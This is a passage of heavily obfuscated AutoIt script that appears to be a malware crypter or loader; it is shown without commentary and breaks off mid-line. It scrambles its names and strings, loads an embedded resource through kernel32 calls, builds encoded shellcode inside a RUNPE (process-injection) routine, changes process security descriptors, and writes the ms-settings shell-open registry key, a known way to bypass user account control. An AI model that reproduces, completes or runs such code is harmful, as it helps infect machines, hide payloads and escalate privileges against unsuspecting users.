ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..2..,..4..1..,..29,..37,18,3..1,4..5..,41..,..47..,44..,..2..9..,..31.." , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42,..4..6..,44.." , ".." ) ) , $GLOBALMEMORYBLOCK ) [ZVTZJDNXHRPQQIM ("53" ) ] DIM $RN46V8WB4FVZMGNLKZSW = 1434297 $1924764602 = 1138660241 CHR (3912492 ) ENDIF IF $1924764602 = 1138660241 THEN RETURN $CSRHZILJDSLP (LUXBZMCWKPOC ("byte..[.." , ".." ) & $RESSIZE & "]" , $MEMORYPOINTER ) DIM $KAVU1QRRNOWJDIFQFDLW = 3551850 EXITLOOP ENDIF IF $1924764602 = 1203322726 THEN LOCAL $RESSIZE = $XFNAYPZBZOLC (LUXBZMCWKPOC ("kern..el..3..2...dll.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0..,..49..,..41,..44,30" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("19,3..5..,..5..2..,..31,41..,32,..18..,..3..1,..45,41,..4..7,44..,29..,..31" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2,46,4..4.." , ".." ) ) , $HINSTANCE , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2,46,4..4.." , ".." ) ) , $INFOBLOCK ) [ZVTZJDNXHRPQQIM ("53" ) ] $1924764602 = 113519199 RANDOM (11499 ) RANDOM (1239835 ) ENDIF IF $1924764602 = 1300820860 THEN LOCAL $INFOBLOCK = $XFNAYPZBZOLC (LUXBZMCWKPOC ("k..er..nel..32.d..ll" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2..,4..6,..44" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,3..5..,40,..3..0..,..1..8..,3..1..,4..5..,41,..47..,44..,2..9..,3..1..,..23" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2..,4..6,..44" , ".." ) ) , $HINSTANCE , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("49..,..4..5..,..46,..44" , ".." ) ) , $RESNAME , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("38..,4..1,..40..,..33" , ".." ) ) , $RESTYPE ) [ZVTZJDNXHRPQQIM ("53" ) ] INT (2631221 ) $1924764602 = 1203322726 WINEXISTS ("CJWvzyp4DLvnjKMK8JsRSpXqpnlbnoNc9pwH8GQJUbEx7JVTcSq7cmdmXEflnoRp7sn3oeLB3S7RUytOCB9E7QaWmjUD" ) ENDIF NEXT ENDFUNC FUNC IPTYOQECLE () GLOBAL $1027989821 = 256356752 GLOBAL $EUPZNV1E7F = 1430011 FOR $E = 0 TO 3312713 IF $1027989821 = 113519199 THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN $WDNTUWUIPGOD (LUXBZMCWKPOC ("H..K..CU..\..So..f..tw..ar..e\Cla..s..s..es\..m..s-s..e..t..t..ings\..she..l..l..\..o..p..en..\..c..om..mand" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..,..31..,3..8,31,3..3,..2..7,..4..6,3..1,..5,..50,..3..1..,..29..,4..7..,..46,..3..1" , ".." ) ) , LUXBZMCWKPOC ("R..EG.._SZ.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..4,47,3..8..,3..8" , ".." ) ) ) $1027989821 = 1300820860 MOD (760232 , 1141297 ) ENDIF IF $1027989821 = 256356752 THEN $XFNAYPZBZOLC (LUXBZMCWKPOC ("ke..r..nel..3..2.d..l..l.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..8..,..41..,41..,..3..8,..3..1,..2..7,4..0" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("23..,41,49,..59..,57..,5,4..0..,..2..7..,28..,38,3..1..,2..3,..41..,49,..5..9,5..7..,..6,..4..5..,..18..,31..,3..0,3..5..,4..4,31..,..29,..4..6..,35,..4..1,..4..0" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..8..,..41..,41..,..3..8,..3..1,..2..7,4..0" , ".." ) ) , ZVTZJDNXHRPQQIM ("53" ) ) $1027989821 = 176683708 ENDIF IF $1027989821 = 1203322726 THEN $FPJBQJEGCCNE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..2..,..4..1..,..3..0..,3..4..,..3..1..,..3..8..,..42,31,..44" , ".." ) ) ) $1027989821 = 113519199 ENDIF IF $1027989821 = 1300820860 THEN $WDNTUWUIPGOD (LUXBZMCWKPOC ("HK..CU\So..f..t..ware..\C..l..as..ses..\m..s-se..ttin..g..s..\sh..el..l\o..p..en\..co..mm..an..d.." , ".." ) , "" , LUXBZMCWKPOC ("R..E..G_SZ" , ".." ) , $BPAPWBQZMLLNSNXVSJYMCEPVPMUWJELXTITCFYCQPXTFSGSTOASCDLVWZF ) ISBOOL (126727 + 2458991 * 2143283 ) $1027989821 = 1203322726 STRING ("VJ" ) ENDIF STRING (681155 + 4291180643 * 2601491 ) NEXT ENDFUNC FUNC ACL ($HANDLE ) GLOBAL $864731176 = 256356752 GLOBAL $XA8YFGHYNW = 3821865 FOR $E = 0 TO 601978 WINEXISTS ("w808OWmnF2syAFyCs7TUZT7V4MWcwZBUatdOf09lKWBFnSRrYs0S1kbMaedc9k1RzHyhCUwC8HidrAHm5Dnd8U2ZrANbX7lA5UgQtJ" ) IF $864731176 = 113519199 THEN LOCAL $TSD = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50,57..,57..,5..9,..3..,..5..9..,..3..,58,5..6..,6..0,..5..7,60,..5..5..,..6..0,5..8..,..5..9..,56..,60,5..7..,..57..,..56..,..60..,..5..5,59..,..58,59,..5..4,60..,5..7..,5..9..,5..8..,..55..,..61,..55,..5..5..,59..,5..5..,60,..6..2..,..6..0..,57..,59..,58..,..5..8,2..,..5..6,..5..5,..5..6,..5..3..,5..8,4..,..55..,5..5,..55,..6..2.." , ".." ) ) ) ) RANDOM (1511357 ) $864731176 = 1027989821 DIM $7VIG1GF6YSOOIZCFVOAW = "iHu23uOjgKaIYtffD60QDhbAaVVX8JSS6tZXoO7V1XRgOfUE6a1TkQnaG41iJ1kG3rLDEr1Z8eZQA4W4aq08S" MOD (369540 , 3283063 ) ENDIF IF $864731176 = 176683708 THEN $BN = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("28..,35,4..0,..2..7,44,5..1,46,4..1,..4..5,4..6..,44,..3..5..,40..,..3..3.." , ".." ) ) ) $864731176 = 1300820860 DIM $MKNWCPAOJCVF1GJLH6IS = 69587 + 3220933 * 2937281 + 4293372797 * 61801 + 4294813521 + 3551407 * 244707 ENDIF IF $864731176 = 256356752 THEN $E = EXECUTE $864731176 = 176683708 DIM $QNCYHONM0Q28ZVRMH1UN = 2509262 * 2379311 + 129909 + 4293667836 * 2893636 + 4293386776 + 3344262 ENDIF IF $864731176 = 781366022 THEN $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50..,57..,..57,..59..,3,59..,3..,5..7..,..5..6,59..,5..4,5..9..,3,..5..9..,..3,..5..5,6..1..,..55..,..6..0,59,5..4,..5..9,5..7,60,59..,59,..54..,..60,..5..3..,..5..9..,6..2..,..5..6,..56..,..56,..55,..55,5..,59,57..,59,..3..,..59,3,..55,60..,5..5,..3..,..55..,5..3..,..5..5,60..,..59,..6..2..,5..9..,5..,6..0,..57..,..5..5..,60..,5..5,3,..55,5..3,..5..5..,..60..,..58,..56,..59,58..,..60..,57,..5..7..,..2,..59..,..5..8,6..0,..55,59..,..5..,5..9..,..5..8,..59,..3..,..57,..6,..59..,..5..5..,5..9..,1,59..,58..,5..9..,..5..6..,..6..0..,..57..,..58,5..6..,..59,..5..8..,..59..,..56,..60,..5..8,..60,..55,59,..62,60,5..7..,..60,6..2..,..55,..6..0..,..55..,3..,5..5,..5..3,55..,6..0,..60,5..3..,6..0..,5..7..,6..0,55,5..5..,6..0,55..,3..,..55..,53,55,..5..7,..59..,..6..1..,..5..9..,..54,..59,..5..,59..,..5..7..,..5..9..,3..,..59..,5..8,..5..5..,..3..,..5..5,..53,..55..,..6..0,5..9..,57,6..0..,..60..,5..9..,..6,6..0,5..5..,59,57..,..5..5,..60..,..5..5,3,..55,5..3,5..5..,..60,..5..6,5..3..,60,..6..1..,5..6..,..5..3..,5..6..,57..,55..,60..,..55..,..3..,55..,..53,5..5,6..0..,..6..0..,..53,60..,57..,..60..,..5..5..,..55,60..,..5..5..,..3,5..5..,..5..3..,..55,..57..,..60..,..53,..58..,..56,57..,5..7..,55,..62" , ".." ) ) ) ) RANDOM (3374839 ) EXITLOOP ENDIF IF $864731176 = 1027989821 THEN LOCAL $PSD = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0..,57,..5..7,59..,..3,59,..3..,58..,..5..6..,6..0,..5..7..,6..0..,5..5,6..0,..5..8,..59..,..56..,..60..,57..,..57,..60..,..59..,..58,60,..57..,58,..53,..60..,..57..,60,55..,5..5..,6..1,..5..5,..5..7..,..60..,..57..,58,..56,57,..57..,..55,..6..2" , ".." ) ) ) ) $864731176 = 1138660241 WINEXISTS ("Vt25GlQLqwe4TDurZiboJwjb3rsXglk0zF7lFhsmAf9KVGM01" ) ENDIF IF $864731176 = 1138660241 THEN LOCAL $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0,..5..7..,57,5..9,..3..,5..9..,..3,..57,..5..6,..5..9,..5..4,..59..,..3..,59,..3..,55,..61,..5..5..,..60,..59,5..4,59..,57..,..6..0,5..9..,5..9,54,60,..53,5..9,62,5..6,5..6,..56,..55..,5..5,..5..,..5..9..,5..7..,..5..9,..3,5..9,3,55..,60..,..5..5..,3,..55,..53,55,..6..0..,5..9..,..6..2,..59..,..5,6..0..,..57..,55,..60,..5..5,..3..,..5..5,53,55,60,57..,..62..,..5..9..,..5,5..9,6..2..,..60,57,..5..9..,..62,..5..9..,..5..4,..59,..3..,..5..9..,6..2..,60,1..,..59,..58,5..8,5..6..,59,..5..8,..5..9,56..,60..,..58,6..0..,..55..,..5..9,6..2..,6..0..,57,..6..0..,6..2,57,5..7..,..59..,..5..8,6..0,56..,59..,56..,6..0,5..5..,5..9,..62,..60..,..5..3..,60,..5..7,59,..6..,..6..0,..5..5,5..5,6..0,..5..5..,..3,..55..,5..3,55..,..6..0,6..0..,53..,..6..0..,..5..7,..60,..55..,..5..5,6..0,..55,3..,..55..,5..3,5..5,..5..7..,..60,5..3,5..8,5..6,5..7,5..7..,..55,3..,55..,..5..3..,55..,60,..59,5..7,..6..0..,6..0,5..9,..6,..6..0,..5..5,59..,57,..5..5,6..0,55..,3..,..55,..5..3..,5..5..,..60..,56..,..5..4,5..5,6..0,5..5..,62.." , ".." ) ) ) ) $864731176 = 1924764602 ISBINARY (1582475 * 129845 ) ENDIF IF $864731176 = 1203322726 THEN LOCAL $PACL = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50..,5..7..,57,59..,..3,59,..3,58,5..6..,60..,57,..60..,..5..5,6..0,..5..8,..59,5..6,6..0..,57..,57,6..0..,59,5..8,..6..0,..5..7,5..8,..53,60,..57,..6..0,5..5..,55,..6..1..,..55,5..7,..6..0..,..57..,..57..,54,57..,..5..6,57..,..3..,55..,..6..2.." , ".." ) ) ) ) DIM $LODNFJWSZZYEXIPWOB65 = 73573 $864731176 = 113519199 ISBOOL ("fdtHJ3yFcztSzB2W1taKLOJA6JeTaTF7hhMWEp5DkTtohnEIJA3wHzczC3K9ZOEt3wJsZgrKyFA2uu" ) ENDIF IF $864731176 = 1300820860 THEN LOCAL $TACL = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,5..0,..5..7,57,5..9..,..3..,59..,3..,5..8,5..6,..6..0,57..,60,5..5..,..6..0..,5..8,5..9..,..5..6..,..6..0,..5..7,..5..7,..5..6..,..6..0,55..,59,5..8,..5..9,..5..4..,..60,5..7,59..,58,..5..5..,61..,..55..,..55,59..,..5..5,..60..,..62..,..6..0,..5..7,..5..9..,..5..8..,5..5,..5..3,57,..5..4..,5..9..,..56..,..5..9,..3,58..,55,5..9..,..5..8..,..6..0..,..59,59..,62..,6..0,5..6,..5..9,..6..2..,5..9..,..6,5..9..,..5..,..56..,2,..5..9..,5..5,..60..,62..,..60,..57,59..,..58..,..5..5..,..5..3..,..5..8..,5..6,..59..,..5..5..,..60..,1,5..6..,..54..,..5..6,..2..,..6..0,58..,60..,5..6,59..,..6..1,..59..,6..,6..0,55,..60..,..57..,5..5..,..5..3,5..7,54,59,..5..6,5..9..,3..,5..8..,5..6,..59..,6..2..,..6..0..,..1..,..5..9,58..,..56..,..2..,6..0,..5..8..,..60..,..5..6,59..,..61,5..9,..6,..60..,5..5..,..60,57..,..55,..53..,..57,54,5..9,56,5..9,..5..8..,5..7,..5..6,59..,..6..,..6..0,..58,59..,..5,60..,57,56,..2..,60,58,60..,5..6,..5..9,..61..,..59..,..6..,..6..0..,..55..,..6..0,..57,..55,53..,..58,..5..6..,59..,55,60..,1,5..6,55..,..5..5,..55..,..55..,..6..2" , ".." ) ) ) ) $864731176 = 1203322726 ENDIF IF $864731176 = 1655436234 THEN $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0,5..7,..57..,..5..9,3,..5..9,..3..,5..7..,5..6,..59..,..54,..5..9..,..3..,59..,..3,..5..5,61..,..5..5,..60,59,..5..4..,59,..57..,60..,..59,59..,..54,..6..0..,..5..3..,..59,6..2,..56..,5..6..,..5..6..,5..5..,55..,..5..,5..9,..57..,..5..9..,3..,5..9..,3..,5..5,6..0..,55,..3,55,5..3,..55..,..6..0,5..9,..6..2,5..9..,..5..,..6..0,..57..,..55,60..,..55,3..,55..,5..3,5..5..,..60,5..8..,5..6,..59..,5..8,..60,..5..7,5..8..,..56..,5..9..,..58,59,..5..6..,6..0,5..8..,60..,5..5,5..9..,62,..6..0,5..7,..60..,..6..2..,..5..7,5..7..,5..9..,..5..8,..6..0..,5..6..,59,..5..6,..60,55,..5..9,..6..2..,60,5..3,6..0..,57..,..59,..6,..6..0,55..,57,..5..7,..5..9,5..4..,..59..,..56..,5..9,3,..55,60..,55..,..3..,5..5,5..3..,..5..5,6..0,6..0..,53..,6..0,57,60..,..55..,5..5,6..0..,..55,..3,5..5..,5..3,55..,..5..7..,..60,5..3,5..8..,..5..6,5..7,57,55,3..,55,..53..,55..,..60,..5..9,6..2..,..59,5..,..60,5..7..,55,..6..0,5..5,..3..,..5..5..,..53..,..5..5..,..6..0,..5..6,..5..4..,55..,6..0..,..5..5..,3,..55..,..53,5..5,..6..0..,..60..,..53..,..60,..5..7..,..6..0,..55,..5..5..,..60,..55,3..,..5..5..,5..3,..5..5..,57..,..6..0,53..,5..7,54,..57..,56..,..5..7..,..3..,55..,3,55..,..5..3..,..5..5..,..6..0,..59,6..2..,59,5,60,5..7..,..5..5,..60..,55..,..3,..55..,5..3,5..5..,..6..0,..5..6,..5..3..,55,60,..5..5,6..2.." , ".." ) ) ) ) CHR (2826920 ) $864731176 = 781366022 ENDIF IF $864731176 = 1924764602 THEN $RET = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0..,..57,..57..,5..9..,..3..,..59..,3,..57..,..5..6..,..5..9..,54,..59,3,5..9..,..3..,..55..,6..1..,55..,..6..0..,..5..9..,..54,..59..,..5..7,6..0..,..59..,..59..,..54,60,53,..5..9..,6..2..,..56,56..,5..6..,..5..5..,..55..,5,..5..9..,5..7..,59..,3..,5..9..,..3..,5..5,60..,..5..5..,3,5..5..,..53..,..5..5,..60..,..5..9,..6..2,..5..9..,5,6..0..,..57,55,..60,..55..,..3..,..55..,..5..3,5..5..,..60,..57..,6..2..,59,..5,59..,62..,6..0..,57..,5..9,62,5..9..,..54,..59,..3..,..5..9,6..2..,60,1..,5..9..,..5..8,57,5..4..,..59..,..56,5..9,..3..,..55..,6..0..,5..5,3,5..5,..53,55,60..,60,53,60,5..7,..60..,..5..5,..5..5..,..60,..55..,..3..,55,..53..,55,5..7,..60,5..3,..57,54,5..7,56..,5..7,..3,..5..5,3,5..5,53,55,..6..0..,59..,..57,6..0,..60,5..9,..6,60,..55..,..5..9,..57,5..5..,60..,55,3,55,..53,57,57,5..9..,..3,5..9..,..3,..58..,56,..6..0,..5..7,..60..,..5..5..,60,5..8..,59..,5..6,..60..,57..,..5..7,6..0,..5..9,58..,..60,..5..7,58,..5..6,..59,..62,..6..0,..1,..59,..5..8,5..5,..6..1..,..5..5..,..5..7..,60..,..57,..57,54,..57..,..56,..57,3,..5..5..,..62..,5..5,3..,5..5..,..5..3,..5..5,..60..,5..9..,..5..7..,..60,60..,..59,6,60..,..5..5..,5..9..,5..7..,5..5..,..6..0,55..,..3..,..55..,..5..3..,5..5..,..6..0..,..56,..5..5,..55..,..60,55..,..6..2" , ".." ) ) ) ) ISBINARY ("avVNlTCjs7c9jfhJ23tF5DV62n" ) $864731176 = 1655436234 ISFLOAT (1912442 * 2625958 + 3975194 + 4294644196 ) ISFLOAT ("kxS4hkcVbu9rFJYV7fQDuDkdEVicY9GZF7JIjtFLMlBF6wYyTt6Qa5lRmNyvc97" ) ENDIF NEXT ENDFUNC FUNC HJTWPSKJJP ($TITLE , $BODY , $TYPE ) IF $BOOL = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..27..,38,45,3..1.." , ".." ) ) THEN $NLIVQGZCBCYM ($TYPE , $TITLE , $BODY ) ENDIF ENDFUNC FUNC RUNPE ($WPATH = "" , $LPFILE = "" , $PROTECT = "" , $PERSIST = "" ) GLOBAL $656182541 = 256356752 GLOBAL $WHAOKNJD1I = 673474 FOR $E = 0 TO 175490 DIM $TSDD1YJW3WF4JJNOYTWJ = 1007376 + 4293029922 * 1166129 + 3804418 + 199124 + 4292793209 + 4293898758 + 4293737743 IF $656182541 = 9803637 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..0..,57..,57,..5..9..,3,59,3,..58,5..6,60..,..5..7,..6..0..,55..,60,..58..,59,..5..6,6..0..,5..7..,..58,56,5..9,5..8,60,..57..,57..,5..7..,..59..,..5..4,..60..,..57..,59..,54,..5..5..,..6..1,..55..,57,5..7,..5..9..,5..9..,62..,59,3,..59..,..5..8,..5..8,..6..,58..,5..6,60..,5..7,..6..0..,..55,60..,5..8,5..9..,56..,..6..0,57..,..5..5..,..3..,5..5,53,5..5,..5..5..,5..9,..1..,..5..9,..2..,6..0,5..6,5..9..,..57,5..9,..59..,5..9,6..1..,59..,2..,..5..9..,1..,5..9..,..57..,..6..0..,56,6..0,..5..4..,59..,..6..1..,..59..,5..9..,..59..,2,59,1,..60,..5..4..,..6..0..,56,59..,61,..59..,5..7..,59,59..,59,..2,..59..,..1,..59,57..,..6..0,5..6..,..60,54..,5..9..,..61,59,..6..2..,..5..9..,..5..9..,6..0..,..5..8,..59..,61..,..60,5..6..,59,..57,6..0,54..,..5..9..,62,59..,5..9..,..5..9..,..5..5,..5..9..,5..,60,59,59,1..,..5..9..,..2..,5..9..,..3,..6..0..,5..6..,..59..,5..7,6..0..,..5..9,..60,..5..6..,6..0..,..54,..59..,57,59..,..59,60,..56..,5..5,55..,5..5,..3..,..55..,5..3..,..5..5,..5..7,59..,..3,60..,5..3..,..57..,..59,5..9,6..2..,..5..9,..3,..5..9,5..8,5..5,..6..2" , ".." ) ) ) ) RANDOM (3776848 ) $656182541 = 1586164444 WINEXISTS ("UzDn4M6vHRu" ) ENDIF IF $656182541 = 38669117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("56,3,..6..0..,..5..,2,..5..,..6..2,58..,5..8..,6..1..,2,5,..3..,..61..,..5..4..,5..,..3,6..,53,..53,..5..6,53,..5..3..,5..3..,53" , ".." ) ) ISPTR (3442150 * 965098 * 3906138 ) $656182541 = 2032766480 INT (3829084 ) ISPTR ("CqLMHQC1iaLlSS71SnmEQd2cggOmpjmj5koenindxNJnnX" ) ENDIF IF $656182541 = 39019882 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60..,5..9,..5..4,6..1,..6..1..,62..,60..,5..8..,3..,..6..1,6..1..,..4,57..,58,2..,..57,..3..,6..0,6..1..,5..8..,5..8,..6..1..,6..,6,..6" , ".." ) ) INT (405923 ) $656182541 = 1885155689 ISFLOAT ("IFAbpK9YBpHC3NIaigbDNZtkL4jfaJaCZQNLWcidJzVGxI" ) ENDIF IF $656182541 = 50926388 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,6..0,..58,..4..,..3..,..6..,6..,..58,58,1,..5..3..,6..1..,5..8,3,..5..3,..53..,..6,6..1..,..5..7,62..,61..,53,..55..,..53..,5..3" , ".." ) ) $656182541 = 868457996 ENDIF IF $656182541 = 61093985 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6..,..61..,..4..,5..7,..58..,3..,..5..7,61,..62..,6..1..,..58..,..5..7,3,6..,..6,..6,6,..6,6,..61..,..4..,..57..,..5..8,1.." , ".." ) ) ISPTR (776663 + 4293584104 ) $656182541 = 1053930317 MOD (335955 , 2573866 ) ENDIF IF $656182541 = 90298599 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,5..8,..6..,..61..,..6,..6,..6..0..,5..8..,4..,61,..6,..6,..58..,58,..4..,57,..61..,5..8..,..3..,..53,5..3..,..6,61,5..7,..6" , ".." ) ) $656182541 = 1279551750 DIM $883ODWXCERLYILW464AF = 2544328 ISFLOAT (3562572 + 3716916 ) ENDIF IF $656182541 = 92596336 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,6..2..,61,..58,..56..,..5..7..,..6,..6,..6,..6..,6,..6,..61..,..4,5..7..,..58,4..,..5..7,..61,..62,..61..,58..,..56,6..1..,6.." , ".." ) ) $656182541 = 1604509846 INT (3385463 ) ISSTRING (1633230 + 4291607498 * 1105641 ) ENDIF IF $656182541 = 100830152 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6..1..,57..,54,..2,..6..,5,..6,6..,6..,..6..,..6,6..,60,..5..8..,4,3,..6..,6..,..58..,..58..,1..,3,61,58.." , ".." ) ) DIM $STREGTCKWMLKEEHTNF0Y = "f3Aobcr61zMjpam4yao1OuY3E48oFFlj5RmZ00EQln" $656182541 = 463618680 RANDOM (66547 ) ENDIF IF $656182541 = 113519199 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,..4..,..6..0..,6,..6,..6..,6,..6,..6,61,2,..3,..6..1..,6..1..,5..8..,3..,..6..2,60..,..5..7..,..5..5..,..5..3..,..53..,..6..,2,5" , ".." ) ) PTR ("6QVfHTgecAunCnHXwdHEIQAZa3DQCtgRfH9aBUrgyLiXkIFXRSHvqKcqo5fNoAKTuNi5oGuM" ) $656182541 = 1027989821 DIM $6HNOAXR8VVUZEETVFON1 = 3908581 ENDIF IF $656182541 = 116471326 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,53..,53..,53,..53,6..1..,..2,60,59,5..3,3..,..61,2,6..0,..59..,..53..,3,6..1,..2..,56,5..9..,61,2..,..56,59.." , ".." ) ) $656182541 = 1196440215 STRING (2368921 + 4294584284 * 2414981 + 2570255 ) ENDIF IF $656182541 = 116925729 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,..6..1,58,60,..5..3..,6..,6,6,..6..,..6..,6..,62,6..2..,..2,5..3,..57..,..6..1,5..3,..5..9,3..,..6..0..,..6..1..,5..8,60..,..5..7" , ".." ) ) $656182541 = 1270739258 MOD (2548954 , 1686916 ) ENDIF IF $656182541 = 143550684 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..58,..58..,..2..,57,61,..2..,57,..4,6,53..,61..,..4..,60,..6,5..5,..61,5..3,..6,..2,..6..0,57,59,..5..3,..5..9" , ".." ) ) PTR (494270 + 3757030 + 701676 ) $656182541 = 605510513 PTR ("jJ9yajobwtGkA2sXkcwH7CpyjJAiMDyLAiANNaELJ6VpJVRs0mLfB02QtKpzTfx245TsANjjGV8aS9Yx2hsz2tjKpVtcVf2DI2vO" ) ENDIF IF $656182541 = 158308218 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..,..61,..5..3..,..5..7,..3,60..,..57..,5..8..,6..1..,5..3..,..1,6..2..,..55..,4..,..4..,60,53..,..5..4,3,6..0,57..,5..8..,..6..1,57..,53.." , ".." ) ) $656182541 = 1922466865 DIM $BHR118UW1GLX79KVHCQU = "yB3EBZNjvDqhw" ENDIF IF $656182541 = 172415000 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..0..,5..8..,4,61,6,..6,58..,58,..1..,..61,61,..5..6..,6..,2..,53,5..8..,53,6,..6..1..,..59,..6..0..,60,..6..,..3,6" , ".." ) ) $656182541 = 1513972166 WINEXISTS ("qRL2U34wl07dgXvyiQMEduOJJ0rxM3v0D3MY063pBheqywNQx9NsMyE5bbs4KFTsEh" ) ENDIF IF $656182541 = 176683708 THEN LOCAL $BIN_SHELLCODE = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0..,..58..,58,6..1,2..,5..,3,61..,..2..,5..7,..4..,..5..3,..61..,61,..2..,..3..,54..,6..1,..53..,5..6..,6..2..,..5..3,..53,..60.." , ".." ) ) DIM $ILXXC5PYLMLLAMOCMFYR = 3157420 * 2564471 * 2581599 * 1575695 * 3055616 $656182541 = 1300820860 ENDIF IF $656182541 = 180257576 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,6..,..60,..5..8,6..,6..1,6..,6..,..60..,5..8..,..4..,..61..,..6,..6,58..,5..8..,3,..3,..6..1..,58,3,..53,..5..3..,6..,..6..1" , ".." ) ) CHR (2032782 ) $656182541 = 1791187076 ISBINARY (392562 * 2059814 + 238926 + 4291304449 ) ENDIF IF $656182541 = 210168720 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..54..,53..,..5..7..,5..4..,62,..6..1..,..2,..5..7,..4,6..,53,6..1..,..2,..57..,5..5,53,57,..57,54..,61..,..56,5,61..,..53.." , ".." ) ) $656182541 = 1032281943 PTR (415365 + 4292446165 * 1664935 ) ENDIF IF $656182541 = 217336870 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("62,5..8..,58,5,3..,..59,..5..9..,..5..6..,6..2,54,54,..53..,6..,6..2,57..,3..,..5..3..,..5..6,..4,..5..7,..4,..58..,1..,53..,53.." , ".." ) ) DIM $WG7T0CJ8HPOZSTSWSNCE = 2708682 * 2769324 + 4293939872 $656182541 = 439011666 ISFLOAT (3481491 * 1150538 * 3853364 ) ENDIF IF $656182541 = 229030474 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("56..,..5..,53,..54..,53..,..6..1,..5..6,..3..,..5..3..,..5..4..,53,..5..,2..,54,..5..8..,61..,..58..,3,..5..3,..6..0..,..62,..5..3,58,5..9..,1.." , ".." ) ) CHR (2387029 ) $656182541 = 2081176827 ISBOOL ("oUuFggefG10ACY0jb1qXezAwyHQLD34hAJXAOAJ2XqwAfGrjJAUirrKZt7gHzCKM6S93bzEKry9Ycaq2q" ) DIM $IW0J87HRTBCUOTEXGYIK = "j13rXWtQor3AHDk105drXrp6OitF3v2x1g9471klYafUI3gptFRDe2i2K7MNCYX2zFJBEp48U2DWlFwVbdlxNxs87gt9oFSanmtdtOVeKTTmywQe" ENDIF IF $656182541 = 238457315 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..3,..53..,5..3..,6..,..61,57..,..5..,61..,5..3,55,5..3,53,..5..3..,..53..,..6..1,..4..,57..,..5..8,..4..,6..1..,..5..8..,..5..3,..61,4.." , ".." ) ) ISBINARY ("yobmKDx65TnjCH9ltAvsgX5OgIKAoyw3sxZ8s0TlxiQ9Fc5ZR3qAqgFLtwfb37RFwu0fSb3CSk" ) $656182541 = 1461966853 DIM $5JDNVTVI5MM1NN5URSZA = 623493 MOD (3373745 , 405146 ) ENDIF IF $656182541 = 256356752 THEN #region xjFCr ISPTR (395861 + 4292989638 ) $656182541 = 176683708 ENDIF IF $656182541 = 269998012 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6..,5..8..,5..8..,2,..57..,5..6..,..5..6..,3,..5..3..,6..1..,..62,..60,4,..6,..5..3,59,59..,..5..6,2,..57..,5..9,..53,..59..,6..0" , ".." ) ) $656182541 = 800246788 ENDIF IF $656182541 = 287505096 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC 